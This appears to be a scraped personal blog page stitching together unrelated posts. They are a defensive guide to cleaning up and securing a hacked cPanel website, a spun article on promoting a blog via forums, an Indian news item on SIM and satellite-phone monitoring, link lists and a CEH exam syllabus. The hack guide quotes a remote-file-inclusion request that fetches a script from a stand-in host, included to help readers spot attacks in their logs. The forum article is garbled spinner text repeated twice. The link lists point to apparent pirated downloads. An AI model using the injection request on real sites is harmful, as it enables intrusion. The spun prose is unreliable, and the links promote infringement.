2. Make sure “Enable FTP folder view (outside IE)” is checked.
3. Click OK.
4. In the IE7 address bar, type the FTP address for your site.
5. Ignore the error page.
6. Click Page > Open FTP site in Windows Explorer…
7. At the FTP Folder Error dialog box, click OK.
8. Click File > Login As… to obtain the login prompt.
c) FTP by Windows Explorer
1. Enable the address bar (View > Toolbars > Address bar). You may need to unlock the toolbars, relocate, and resize it.
2. In the address bar, type the FTP address for your site.
3. At the FTP Folder Error dialog box, click OK.
4. Click File > Login As… to obtain the login prompt.
5d) What to look for
Regardless of the method you used to get your file list, look for and repair the following. If hacked pages contain clues such as URLs that will help identify the hacker, copy and save the useful text somewhere before you repair the page:
* Files you know don’t belong there. Some hacks install files with ridiculously obvious names like hacked.html or vulnerable.php, etc. Other files might have nonsensical names or names consisting of random character strings. Some files might be in locations that make them suspicious, like a .php file in your /images folder.
Be watchful for any files you don’t recognize, but be careful because some of them are probably required for your site to function properly and you just never noticed them before. You cannot just delete all the files you didn’t put on the site. Determine whether each one is malicious or not. When in doubt, try a web search on the filename or post a question in a forum where other people can tell you if that file is normal.
* Check your root directory (“/”) and its subdirectories for malicious or altered files. Inspect everything carefully. Even if you delete the contents of your public_html and republish the site from scratch, this doesn’t overwrite your folders above public_html, so you must check those manually.
* Find and remove malicious scripts. Look especially for PHP and CGI scripts that you didn’t create. Inspect existing PHP and other plain text scripts for signs of tampering. Backdoor scripts left in place can allow the hackers back in even after you’ve changed your password.
When in doubt, it is safest to stop using scripts you suspect might have been weak, especially ones you wrote yourself, until you can examine them and determine that they’re safe. Rename or delete them so the hacker can’t continue to access them by their previous names.
* Pages with modified dates more recent than you last saved the page yourself. Inspect the text and replace the file with a backup copy, if necessary.
* If you publish with FrontPage HTTP, it appears that whenever you publish any files, the timestamp of every .htm file on the site is set to the time of the publish. So in this case your timestamps may all be identical, except for hacked pages.
6) Check all file and folder permissions
Using the complete file list you made, or File Manager, make sure all file and folder permissions are what they should be. When in doubt, you can compare the permissions of similar or neighboring files and folders. A hacker is unlikely to bother with changing all permissions. Review the brief “RWX” explanation above and apply common sense. Your site visitors are “World”, so World needs Read access to files they are supposed to see. World should almost never have Write access to anything. Although different hosts might have different rules, common permissions for world-accessible folders are 755, and common permissions for world-accessible files are 644. It is left to you to figure out why. If you start running across what look like permissions hacks, you will need to do some studying and some detailed investigation of each file and folder.
A hacker can modify file or folder permissions to allow them to get back in even after you clean up everything else in your site. If they can get Write permission to one folder, they can upload exploit scripts to it and run them.
7) Change your passwords again
In case someone was “watching” inside your site while you did it the first time, do it again now that you know the site is clean.
Try to identify the hacker’s IP address
Stats programs like Analog, Webalizer, or AWStats are not going to be helpful here because they generate aggregated statistics. You need detail.
cPanel > Web/FTP Stats > Latest Visitors is useful and easy. It is a good place to go when you first notice the hack, but it is only a start. You really need the full raw logs.
a) If you have never used your site’s raw access logs before:
You website’s raw access logs are stored and sent to you as gzipped files. If you don’t have a program that will extract *.gz files, get the 7-Zip program from http://www.7-zip.org/. It is a command line utility that you run from a “DOS box” (aka “Command Prompt”).
b) Get your logs from cPanel > Raw Log Manager
1. Go to cPanel > Raw Log Manager
2. Click the name of the file you want to download.
3. At the Open or Save prompt, click Save. Use a descriptive filename. Save the file to a folder that will be easy to navigate to in a Command Prompt. C:TEMP works well.
4. Open a Command Prompt:
Start > All Programs > Accessories > Command Prompt, or
Start > Run > cmd.exe
5. Go to the folder where you saved the .gz file: cd temp
6. Type the command line to extract the .gz file:
7za.exe x filename.gz
7. You should get a report that says “Everything is Ok”.
8. I usually delete the .gz file and rename the output file to .log.
9. WordPad is best for viewing these log files as text. Set the font to a monospaced font, with word wrap Off.
10. You can import your HTTP (regular) log file into the Webstats.mdb Access database. It won’t import your FTP log.
11. The HTTP log will also import into Excel, but you will need to tweak the text import wizard settings to get the fields into their columns properly.
12. The FTP log is probably best viewed as text.
Go through the logs carefully. If log archiving was on at the time of the hack, look for suspicious activity in the days prior to the hack. Keep watching the logs in case the hackers come back.
Your regular log will show HTTP accesses, your normal site visitors. Mixed in with all the visitors and legitimate robots, you could find a person or robot GETting pages in an abnormal browse sequence (not following links on your site) or trying to GET pages that don’t exist on your site. They might be seeing if your site has particular pages that are part of widely used scripts that are known to have vulnerabilities. Look for HTTP POST activity. Not all POSTs are suspicious, though. If you use PHP, look for requests that attempt to inject code or variables into the page:
GET /index.php?inc=http://badsite.com/hackscript.txt.
Your FTP log will show FTP accesses, one way that hackers can download your pages, modify them, and upload them back to your website. The only IP addresses in the FTP log should be yours and other authorized FTP users.
In both logs, check the field called REMOTE_USER, User, or UserID. In the HTTP log, this field is blank (“-”) most of the time. Where it does have a value, make sure it’s your UserID and that the IP address is yours. Make sure the timestamps on the accesses match the times you were logged in.
c) Use .htaccess or cPanel > Deny IP to block the hacker’s HTTP access to your site
If you identified the hacker’s IP address, one site where you ca
n look it up to get more information about it is http://whois.domaintools.com/.
You can ban the hacker’s IP address from your site using your public_html/.htaccess file. Apache documentation for this is at: http://httpd.apache.org/docs/1.3/mod/mod_access.html.
Review the instructions in a prior article for how to open .htaccess for editing. As described there, insert the following line in a part of the file that is not enclosed in HTML-like tags.
deny from nnn.nnn.nnn.nnn
The nnn’s are the IP address to block.
If the hacker returns with a different IP that is in the same IP range (i.e. using the same ISP), you can block the whole range for a while, although that carries the risk of banning legitimate visitors, too.
The Apache documentation has instructions for banning a range. Some IP ranges are easily specified using a simple wildcard notation. Others ranges can only be successfully defined using “CIDR/netmask” notation. Although it looks intimidating, it’s easy after the first time you do it. I have a separate article describing how to calculate and use the CIDR/netmask.
d) If the hacker has obtained access to your cPanel or FTP, banning their IP address in .htaccess will NOT keep them out of cPanel and FTP.
If they have scripts that they call by HTTP, it will prevent them from doing that, but only until they log into cPanel and un-ban themselves in .htaccess.
9) Investigate what made the hack possible
It might be obvious or it might require detective work. The section below on hack prevention describes some common avenues of attack. It is important to identify how they got in so you can prevent the next attack. For example, if they got in through a vulnerable script, and you don’t rewrite or update the script, all the work you’ve done to this point is useless because they can come right back and wreck your site again.
Three common avenues:
1. Old versions of third party scripts with known vulnerabilities. Make sure you are using the latest versions of software for forums, image galleries, blogs, and everything else.
If you do all your installations through Fantastico, you can check your versions at cPanel > Fantastico > Installations overview.
Otherwise, the version is usually shown on the pages generated by the script, so go to your gallery, blog, or forum, and look around. Then compare the version to the latest one being distributed at the website for that software.
2. The site password was easy to crack.
3. Homebrew PHP or CGI scripts were flawed and had security holes. Make sure the settings in your php.ini file are as secure as possible.
10) Report or go after the hacker legally?
You can try, but your chances of getting anywhere with it might not be great.
Hacking is a violation of the terms of service for any legitimate web host or ISP. If you can prove that someone is using a particular IP address for hacking, you could report the incident to the web host or ISP in hopes that they might shut the perpetrator down. The contact email is often abuse@ the company.
What to do BEFORE your website is hacked, so it doesn’t get hacked
What is a hack?
A hack occurs when someone gets write access to your server so they are able to modify, add, or delete pages.
Many people ask, “How could my site have been hacked? The hacked page was 100% pure HTML.”
The answer is that the modification of the page wasn’t the hack. The hack was when they got write access to the server. Modifying the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING with your site that you can do, including alter static pages.
Why do they do it?
Business/money
The goal of most site hacks is to use vulnerable sites to make money. It is a business enterprise. They can:
* Use your site’s mail server to send spam.
* Insert links to their own sites, visible or invisible. The links from your site to theirs bring traffic and also boost their site’s rankings in search engines.
* Insert their AdSense code onto your site’s pages so clicks are credited to them.
* Put phishing pages on your site to try to obtain confidential information from your visitors.
* Use your server to host illegal content.
* Add viruses, adware, or spyware to your site so it’s downloaded onto your visitors’ computers to try to obtain their confidential information.
Fun, challenge, prestige, or malice
There are hackers who deface sites individually, but it’s time-intensive to hack sites one by one. Occasionally a site is hacked by someone who dislikes the site or its owner. These are not the major threats.
How do they do it?
Some examples:
* Automated web crawlers cast a wide net, identifying websites with a specific security weakness. For example, if a popular script is found to have a vulnerable page called forminfo.php, the crawler will visit every website it knows about, issuing a request to GET forminfo.php. If the request returns a code 404 (Page Not Found), then it moves on. If the page returns a code 200 (Success), the website becomes a target, either by a human hacker or by a computer program that executes the steps to exploit the weakness and install the hacker’s files onto the site.
* Crawl the web searching the source code of web pages for PHP or CGI scripts with names commonly used by email forms handlers. When one is found, an automated procedure starts sending it input to test whether the script can be tricked into sending spam to third parties.
* Automated password cracking programs hammer at cPanel logins until the correct user ID and password combinations are found. People who create their own passwords are remarkably predictable, and the algorithms used for password cracking are remarkably sophisticated.
Steps to prevent hacking
1) Always use strong passwords
If you don’t know what a strong password looks like, go to https://www.grc.com/passwords.htm. The third row on that page (“63 random alpha-numeric characters”) contains the types of characters to use for cPanel passwords. Pick the first, or any, 8 chars from that row. Any password that does not look like the ones you see on that page are bad.
* In cPanel, only 8 characters are significant, so use all 8. Use a mixture of upper and lower case letters and digits. Special characters (punctuation, etc.) do not seem to be allowed by cPanel.
The #1 threat to your website is internet attackers. There are thousands of them, and they will definitely try to damage your website if they get in. That is why you MUST use strong passwords that are difficult to crack. This must be the FIRST consideration.
Write down your strong password so you don’t forget it. People sometimes avoid strong passwords because they’ve heard passwords should never be written down. That rule was for Defense Department workers who had to worry about Soviet spies. You don’t. You have to worry about internet hackers. Writing down your strong password is only a trivial security risk. Using a weak password because that’s the only kind you can remember is a huge security risk.
Keep your written passwords appropriately safe for your situation. Do you have mischievous children? Don’t leave passwords lying around where they can find them. Malevolent coworkers? Don’t leave passwords in your desk drawers. Do you habitually lose your wallet or purse? Well then, don’t keep them there, either. Take whatever precautions are necessary for YOUR situation.
If you have a userID associated with your hosting account, keep that as secret as possible, too, because a hacker needs it to log in as you. Don
‘t post it in forum messages.
About strong passwords: http://en.wikipedia.org/wiki/Strong_password#strong_passwords
2) Don’t weaken your server’s file and folder permissions
* Do not modify the file and folder permissions on your server until you know what you’re doing. Study the permission settings carefully. Don’t guess.
Each folder and file on your Linux server has a set of permissions that determine who can read or write that file, execute that program, or enter that folder.
One mistake in a file or folder permission can allow a hacker to get into your site, and they won’t even need your password to do it.
3) Keep third party scripts up to date
If you use popular third party scripts like Coppermine, WordPress, SMF, vBulletin, phpBB, or any others, get on a mailing list or visit forums where updates are announced. When a security update is released, install it without delay.
When a vulnerability is found in a commonly used script, it is likely to be exploited soon by a lot of hackers because it gives them access to a large number of sites.
4) Write your own scripts securely
* Be aware of the potential security risks of each language you use.
* For PHP, use a php.ini file to block some common avenues of attack.
* Don’t use potentially insecure features of any language until you’ve studied and understand them. There are lots of online resources for learning how to code securely.
A vulnerable script can give hackers access to your user database and financial or other confidential or data.
* All data that comes into your script from the outside world poses a potential security risk. If your script takes input from a user or from passed parameters in a URL string or from a cookie, the input needs to be checked for validity, tested to determine if it contains injection exploit code, and cleaned (“escaped”) before you use it to include a file or access a database.
5) Block suspicious accesses with .htaccess
If you detect especially suspicious activity in your logs, you can block the IP addresses by using cPanel > Deny IP or with the appropriate code in your .htaccess file. Don’t be overzealous, though. It takes experience to learn what’s really suspicious and what’s just unfamiliar, and accidentally blocking legitimate visitors is bad public relations. Besides, if your site is otherwise secure, the probes to find security holes will fail, anyway.
6) Keep spyware off your computer. Prevent password interception.
* If you use a wireless network, make sure it is not open to eavesdroppers.
* Keep your computer free of spyware such as keyloggers.
* If you’re worried about your password being intercepted between you and your server, use encrypted https to log in to your server.
Preparations that will make hack diagnosis easier
1) Turn on log archiving in cPanel
Periodically delete the accumulated logs so they don’t consume all your hard drive space.
2) Get a complete list of your site files while they are known-good
This will be a baseline list of all the files that are supposed to be in your website. After a hack, it will help you decide whether a file you don’t recognize is related to the hack or is a required system file that you just never noticed before.
3) Explore your website and become familiar with what is there
Not just your pages, but the whole site, using FTP or File Manager. Get used to what is normal so things that aren’t will catch your attention.
How to know if you’ve been hacked
1) Whenever you log into cPanel,
Make sure “Last login from:” at the top of the screen shows your IP address from the last time you logged in.
2) Be alert for anything unusual when reviewing your
* Access logs,
* Usage reports in Webalizer, AWStats, Google Analytics, …
* Site data at Google Webmaster Central, (Google account and login required)
* Site data at Yahoo! Site Explorer. (Yahoo! account and login required)
Watch for occurrences of
* Unusual page names that you know you didn’t put on your site,
* Referrals or backlinks coming from weird sites or bad neighborhoods,
* Any indications that your site has pages it shouldn’t have, or connections to other sites that it shouldn’t have any connection with.
3) If your position in Google falls suddenly or if you drop out of the index,
one possible cause is that an exploit made modifications to your pages. Google sometimes notifies webmasters when they suspect a site has been hacked: http://www.mattcutts.com/blog/how-google-handles-hacked-sites/. They’ll try to contact you by any email address they can discover in their files or on your site. If Google discovers that your hacked site is now trying to distribute viruses or other badware, they sometimes also warn visitors about it when they try to go to your site from a search results page.
4) On search engine result pages (SERPs), make sure the text snippets for pages from your site consist of text you know is on those pages.
5) Use your browser’s View Source feature occasionally to look for invisible links in the HTML of your pages.
6) Check your site’s safety report and outlinks at http://www.siteadvisor.com/.
How to Use Forums to Promote Your Blog
- By
- 0 comments
Getting a blog page is a fantastic thing: you can advertise your products and providers and get a great deal of attention for the business; you possibly can encourage your perform, whether being a painter, photographer, or writer, and maybe even receive a work associated on the issues that you just adore; or you'll be able to purely express oneself and also update your family and buddies on the goings-on inside your existence, which can be great in the event you reside in a very faraway place and cannot update your family members and pals more than after.
On the other hand, a website may also be a great way for you personally to generate income, over and above mere expression and promotion.
Thanks to a great deal of various online money-earning strategies, you possibly can gain commissions when site visitors go in your blog page. For example, you'll be able to set up advertisements against your internet site via an affiliate network or via an marketing system. If among your site visitors clicks in your advertisings, then you definately get commissions. The advertisings are tailored to fit the contents of the web page, and they are produced to ensure your website visitors will most likely be considering them and thereby click on them. Therefore, you should have excellent website articles, as it is what the ad organizations will need to be able to know what kind of advertisings to location against your site.
Furthermore, the much more site visitors you've got, the better the chance that someone will click against your advertisements and that you simply will get commissions.
This suggests which you have to invite a lot more individuals on your blog page, and not just to obtain income, but to obtain focus. Immediately after all, if your web site is interesting enough, you may well get plenty of people linking to you. A single way that you simply can promote your web site is by way of posting on forums.
If you're considering putting up in forums and getting your voice heard, and if you would like to have your website noticed in the World wide web universe, then you certainly may be keen on the following points. Take note, however, that these are only a handful of points to guide you on your solution to blog superstardom, and you should learn on your personal along the way and choose up your own personal lessons, too.
- Publish inside of a online community that you just are actually considering. Feel it or not, the degree of one's knowing of and awareness in a topic in a very community forum will shine as a result of your posting. If folks see that you really are keen on the forum subject, then you certainly may possibly get more attention than persons just reading your community forum post.
- Submit in a very discussion board whose issue is associated in your blogging theme. This can be essential when you are dealing with die-hard fans of the particular artist or film, simply because submitting off-topic posts in a very community forum concentrated with users who have just one interest and aim can be distracting, not to mention grounds for kicking you out from the community forum.
- Be dignified plenty of to spell appropriate. Text shortcuts can make texts nearly unreadable, and you also can annoy a full good deal much more persons. Should you make the work to publish with your weblog, make an energy to create effectively for the forums, or you may possibly come across it tougher to invite men and women to read your web site. Why must they study your weblog when they cannot even understand what you are putting up for the online community?
- Extend assist to other forum members when they will need it. Remember, individuals don't care about what you have to say right up until they uncover out that you just treatment about them primary.
source : net
On the other hand, a website may also be a great way for you personally to generate income, over and above mere expression and promotion.
Thanks to a great deal of various online money-earning strategies, you possibly can gain commissions when site visitors go in your blog page. For example, you'll be able to set up advertisements against your internet site via an affiliate network or via an marketing system. If among your site visitors clicks in your advertisings, then you definately get commissions. The advertisings are tailored to fit the contents of the web page, and they are produced to ensure your website visitors will most likely be considering them and thereby click on them. Therefore, you should have excellent website articles, as it is what the ad organizations will need to be able to know what kind of advertisings to location against your site.
Furthermore, the much more site visitors you've got, the better the chance that someone will click against your advertisements and that you simply will get commissions.
This suggests which you have to invite a lot more individuals on your blog page, and not just to obtain income, but to obtain focus. Immediately after all, if your web site is interesting enough, you may well get plenty of people linking to you. A single way that you simply can promote your web site is by way of posting on forums.
If you're considering putting up in forums and getting your voice heard, and if you would like to have your website noticed in the World wide web universe, then you certainly may be keen on the following points. Take note, however, that these are only a handful of points to guide you on your solution to blog superstardom, and you should learn on your personal along the way and choose up your own personal lessons, too.
- Publish inside of a online community that you just are actually considering. Feel it or not, the degree of one's knowing of and awareness in a topic in a very community forum will shine as a result of your posting. If folks see that you really are keen on the forum subject, then you certainly may possibly get more attention than persons just reading your community forum post.
- Submit in a very discussion board whose issue is associated in your blogging theme. This can be essential when you are dealing with die-hard fans of the particular artist or film, simply because submitting off-topic posts in a very community forum concentrated with users who have just one interest and aim can be distracting, not to mention grounds for kicking you out from the community forum.
- Be dignified plenty of to spell appropriate. Text shortcuts can make texts nearly unreadable, and you also can annoy a full good deal much more persons. Should you make the work to publish with your weblog, make an energy to create effectively for the forums, or you may possibly come across it tougher to invite men and women to read your web site. Why must they study your weblog when they cannot even understand what you are putting up for the online community?
- Extend assist to other forum members when they will need it. Remember, individuals don't care about what you have to say right up until they uncover out that you just treatment about them primary.
source : net
Govt to DoT: Ensure strict verification for SIMs
- By
- 0 comments
NEW DELHI: In the backdrop of mobile phones having Indian SIM cards and UAE's Thuraya satellite phone used by Pakistani terrorists during Mumbai attack last week, the home ministry on Wednesday asked the department of telecommunication (DoT) to quickly devise a mechanism of a "strict consumer verification" exercise and formulate a comprehensive policy on "monitoring and intercepting" sat phones.
The ministry's concerns were conveyed to DoT after the issue came up for discussion in a high-level meeting chaired by home minister P Chidambaram who reviewed all aspects of telecom having security implications.
The issue of use of Chinese mobile phone handsets — which do not have International Mobile Equipment Identities (IMEI) — also came up for discussion. Since it is the IMEI number which mainly helps agencies to trace the handset user, the intelligence agencies had recently pitched for a ban on Chinese handsets.
The minister was, however, informed that DoT, taking such concerns in mind, has already "directed all the access service providers to make provision of Equipment Identity Registry (EIR) so that calls without IMEI or Electronic Serial Number (ESN) or those with IMEI or ESN with all zeros are not processed, and rejected".
Besides senior home ministry and DoT officials, the meeting was also attended by senior officers of IB, RAW and the National Technical Research Organisation (NTRO). The NTRO keeps track of technological aspects of intelligence in coordination with other agencies.
Sources in the ministry said that DoT had proposed to set up a National Surveillance Grid to create a centralized communication monitoring agency. The Grid would help remove multiplicity of authorities in telecom/internet/Voice Over Internet Protocal monitoring exercises as currently it is being done by different agencies, they added.
At present, interception of sat phones is a big problem in India as none of the international operators have a hub here. Since these phones — provided by operators like UAE's Thuraya and a consortium led by Inmarsat — do not need interconnectivity with the network of any country's domestic network, they can be used anywhere in the world without any hitch.
Source : Net news
The ministry's concerns were conveyed to DoT after the issue came up for discussion in a high-level meeting chaired by home minister P Chidambaram who reviewed all aspects of telecom having security implications.
The issue of use of Chinese mobile phone handsets — which do not have International Mobile Equipment Identities (IMEI) — also came up for discussion. Since it is the IMEI number which mainly helps agencies to trace the handset user, the intelligence agencies had recently pitched for a ban on Chinese handsets.
The minister was, however, informed that DoT, taking such concerns in mind, has already "directed all the access service providers to make provision of Equipment Identity Registry (EIR) so that calls without IMEI or Electronic Serial Number (ESN) or those with IMEI or ESN with all zeros are not processed, and rejected".
Besides senior home ministry and DoT officials, the meeting was also attended by senior officers of IB, RAW and the National Technical Research Organisation (NTRO). The NTRO keeps track of technological aspects of intelligence in coordination with other agencies.
Sources in the ministry said that DoT had proposed to set up a National Surveillance Grid to create a centralized communication monitoring agency. The Grid would help remove multiplicity of authorities in telecom/internet/Voice Over Internet Protocal monitoring exercises as currently it is being done by different agencies, they added.
At present, interception of sat phones is a big problem in India as none of the international operators have a hub here. Since these phones — provided by operators like UAE's Thuraya and a consortium led by Inmarsat — do not need interconnectivity with the network of any country's domestic network, they can be used anywhere in the world without any hitch.
Source : Net news
LEARN GERMAN LANGUAGE :
- Monday, August 8, 2011
- By
- 0 comments
http://www.germanlanguagecentre.com/
http://www.9down.com/category/movies/tag-hdtv/
http://www.germanlanguagecentre.com/COURSES.html
glc.patna@gmail.com
http://www.9down.com/category/movies/tag-hdtv/
http://www.germanlanguagecentre.com/COURSES.html
glc.patna@gmail.com
IMPORTANT & INTERSTING URLs
- By
- 0 comments
http://www.koflash.com/category/photography/#22 FLASH
http://www.flashxml.net/
http://www.timothy-hogan.com/
http://pixlr.com/editor/#3832 ONline picture editor
http://www.wallcate.com/2010/09/predators-wallpapers.html wallpapers
http://www.onestopwebmasters.com/top-5-beta-windows-8-desktop-wallpapers/
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_Cookbook.pdf
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_Cookbook_book_2.pdf don
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_Cookbook_books_1_and_2.pdf don
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_book_3.pdf don
http://www.maangchi.com/
http://www.legendscrolls.co.uk/quillpad/packages/QuillPadInstaller.jar
http://www.softwareag.com/gc/bpmfordummies.html?gclid=CKflr-uHsKoCFQUb6wodZRJq8Q
http://www.4shared.com/get/a5UZqfZt/_Knitting__Jan_Eaton_-_Funky_C.html 65 mb don
www.kidsfortigers.org
www.about.com
www.whyfiles.org
windows2universe.org
howstuffworks.com
snaps also
http://prabhatkhabar.com/taxonomy/term/21?page=2
http://www.search.tk/index.html&_=1312273062
http://bradblogging.com/featured/6150-high-quality-icons-for-pratical-website-design-blog-design-usage/
http://bradblogging.com/featured/6150-high-quality-icons-for-pratical-website-design-blog-design-usage/
http://www.freewarefiles.com/BluePOS-Caller-ID_program_45232.html
http://www.honeytechblog.com/your-next-lifesaver-is-hirens-boot-cd-94/
http://www.4shared.com/get/aFLl4yZn/HirensBootCD93__9DownCOM.html
http://www.4shared.com/get/aFLl4yZn/HirensBootCD93__9DownCOM.html?tsid=20110730-052223-b9ecc79d
http://storemags.com/webuser-14-july-2011-uk/
http://www.4shared.com/get/ovF6hYHH/Anti_Virus_for_Linux.html don
http://www.4shared.com/get/giyWR_B6/Wireless_Books.html don
http://www.4shared.com/get/728xjFgY/UBX86.html
http://en.wikipedia.org/wiki/History_of_Microsoft_Windows : History of Microsoft
Windows
http://www.soft-games.com/php/categories.php?id_categoria=5&ordenar=&pagina=5
GAMES
http://www.soft-games.com/php/software.php?id_programa=2264&download-Image-Analyzer-1.29
IMAGE EDITOR
http://www.zoesoft.com/console-calculator/ccalc-downloads/ : console-calculator
http://www.youngcomposers.com/ COMPOSE YOUR OWN MUSIC
http://wiki.youngcomposers.com/ COMPOSE YOUR OWN MUSIC
http://1337x.org/search/windows+8/2/ : WINDOWS 8 DOWNLOADS
http://www.flashxml.net/
http://www.timothy-hogan.com/
http://pixlr.com/editor/#3832 ONline picture editor
http://www.wallcate.com/2010/09/predators-wallpapers.html wallpapers
http://www.onestopwebmasters.com/top-5-beta-windows-8-desktop-wallpapers/
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_Cookbook.pdf
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_Cookbook_book_2.pdf don
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_Cookbook_books_1_and_2.pdf don
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_book_3.pdf don
http://www.maangchi.com/
http://www.legendscrolls.co.uk/quillpad/packages/QuillPadInstaller.jar
http://www.softwareag.com/gc/bpmfordummies.html?gclid=CKflr-uHsKoCFQUb6wodZRJq8Q
http://www.4shared.com/get/a5UZqfZt/_Knitting__Jan_Eaton_-_Funky_C.html 65 mb don
www.kidsfortigers.org
www.about.com
www.whyfiles.org
windows2universe.org
howstuffworks.com
snaps also
http://prabhatkhabar.com/taxonomy/term/21?page=2
http://www.search.tk/index.html&_=1312273062
http://bradblogging.com/featured/6150-high-quality-icons-for-pratical-website-design-blog-design-usage/
http://bradblogging.com/featured/6150-high-quality-icons-for-pratical-website-design-blog-design-usage/
http://www.freewarefiles.com/BluePOS-Caller-ID_program_45232.html
http://www.honeytechblog.com/your-next-lifesaver-is-hirens-boot-cd-94/
http://www.4shared.com/get/aFLl4yZn/HirensBootCD93__9DownCOM.html
http://www.4shared.com/get/aFLl4yZn/HirensBootCD93__9DownCOM.html?tsid=20110730-052223-b9ecc79d
http://storemags.com/webuser-14-july-2011-uk/
http://www.4shared.com/get/ovF6hYHH/Anti_Virus_for_Linux.html don
http://www.4shared.com/get/giyWR_B6/Wireless_Books.html don
http://www.4shared.com/get/728xjFgY/UBX86.html
http://en.wikipedia.org/wiki/History_of_Microsoft_Windows : History of Microsoft
Windows
http://www.soft-games.com/php/categories.php?id_categoria=5&ordenar=&pagina=5
GAMES
http://www.soft-games.com/php/software.php?id_programa=2264&download-Image-Analyzer-1.29
IMAGE EDITOR
http://www.zoesoft.com/console-calculator/ccalc-downloads/ : console-calculator
http://www.youngcomposers.com/ COMPOSE YOUR OWN MUSIC
http://wiki.youngcomposers.com/ COMPOSE YOUR OWN MUSIC
http://1337x.org/search/windows+8/2/ : WINDOWS 8 DOWNLOADS
CEH :Ethical Hacking and Countermeasures (312-50)
- Wednesday, July 20, 2011
- By
- 0 comments
Ethical Hacking and Countermeasures (312-50)
• The exam codes EC0-350 are 312-50 are the same exam.
• The exam title "Certified Ethical Hacker" and "Ethical Hacking and Countermeasures" are the same
• VUE and Prometric systems use different exam codes.
• The CEHv4 exam has been retired since June 1st 2007
• CEHv5 exam is available on Prometric Prime, APTC and VUE.
• Exams at VUE and Prometric APTC requires Eligibility Code.
• Please visit :
• http://www.eccouncil.org/takeexam.htm for details
•
• Credit Towards Certification
Certified Ethical Hacker
Master of Security Science (MSS)
Skills Measured
The Exam 312-50 tests CEH candidates on the following 22 domains.
1. Ethics and Legal Issues
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web Based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Hacking Linux
19. IDS, Firewalls and Honeypots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing Methodologies
Skills Measured
The Exam 312-50 tests CEH candidates on the following 22 domains.
1. Ethics and Legal Issues
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web Based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Hacking Linux
19. IDS, Firewalls and Honeypots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing Methodologies
Ethics and Legality
Ethics and Legality
Understand Ethical Hacking terminology
Define the Job role of an ethical hacker
Understand the different phases involved in ethical hacking
Identify different types of hacking technologies
List the 5 stages of ethical hacking?
What is hacktivism?
List different types of hacker classes
Define the skills required to become an ethical hacker
What is vulnerability research?
Describe the ways in conducting ethical hacking
Understand the Legal implications of hacking
Understand 18 U.S.C. § 1030 US Federal Law
Footprinting
Define the term Footprinting
Describe information gathering methodology
Describe competitive intelligence
Understand DNS enumeration
Understand Whois, ARIN lookup
Identify different types of DNS records
Understand how traceroute is used in Footprinting
Understand how e-mail tracking works
Understand how web spiders work
Scanning
Define the term port scanning, network scanning and vulnerability scanning
Understand the CEH scanning methodology
Understand Ping Sweep techniques
Understand nmap command switches
Understand SYN, Stealth, XMAS, NULL, IDLE and FIN scans
List TCP communication flag types
Understand War dialing techniques
Understand banner grabbing and OF fingerprinting techniques
Understand how proxy servers are used in launching an attack
How does anonymizers work
Understand HTTP tunneling techniques
Understand IP spoofing techniques
Enumeration
What is Enumeration?
What is meant by null sessions
What is SNMP enumeration?
What are the steps involved in performing enumeration?
System hacking
Understanding password cracking techniques
Understanding different types of passwords
Identifying various password cracking tools
Understand Escalating privileges
Understanding keyloggers and other spyware technologies
Understand how to Hide files
Understanding rootkits
Understand Steganography technologies
Understand how to covering your tracks and erase evidences
Trojans and Backdoors
What is a Trojan?
What is meant by overt and covert channels?
List the different types of Trojans
What are the indications of a Trojan attack?
Understand how “Netcat” Trojan works
What is meant by “wrapping”
How does reverse connecting Trojans work?
What are the countermeasure techniques in preventing Trojans?
Understand Trojan evading techniques
Sniffers
Understand the protocol susceptible to sniffing
Understand active and passive sniffing
Understand ARP poisoning
Understand ethereal capture and display filters
Understand MAC flooding
Understand DNS spoofing techniques
Describe sniffing countermeasures
Denial of Service
Understand the types of DoS Attacks
Understand how DDoS attack works
Understand how BOTs/BOTNETS work
What is “smurf” attack
What is “SYN” flooding
Describe the DoS/DDoS countermeasures
Social Engineering
What is Social Engineering?
What are the Common Types of Attacks
Understand Dumpster Diving
Understand Reverse Social Engineering
Understand Insider attacks
Understand Identity Theft
Describe Phishing Attacks
Understand Online Scams
Understand URL obfuscation
Social Engineering countermeasures
Session Hijacking
Understand Spoofing vs. Hijacking
List the types of Session Hijacking
Understand Sequence Prediction
What are the steps in performing session hijacking
Describe how you would prevent session hijacking
Hacking Web Servers
List the types of web server vulnerabilities
Understand the attacks Against Web Servers
Understand IIS Unicode exploits
Understand patch management techniques
Understand Web Application Scanner
What is Metasploit Framework?
Describe Web Server hardening methods
Web Application Vulnerabilities
Understanding how web application works
Objectives of web application hacking
Anatomy of an attack
Web application threats
Understand Google hacking
Understand Web Application Countermeasures
Web Based Password Cracking Techniques
List the Authentication types
What is a Password Cracker?
How does a Password Cracker work?
Understand Password Attacks - Classification
Understand Password Cracking Countermeasures
SQL Injection
What is SQL injection?
Understand the Steps to conduct SQL injection
Understand SQL Server vulnerabilities
Describe SQL Injection countermeasures
Wireless Hacking
Overview of WEP, WPA authentication systems and cracking techniques
Overview of wireless Sniffers and SSID, MAC Spoofing
Understand Rogue Access Points
Understand Wireless hacking techniques
Describe the methods in securing wireless networks
Virus and Worms
Understand the difference between an virus and a Worm
Understand the types of Viruses
How a virus spreads and infects the system
Understand antivirus evasion techniques
Understand Virus detection methods
Physical Security
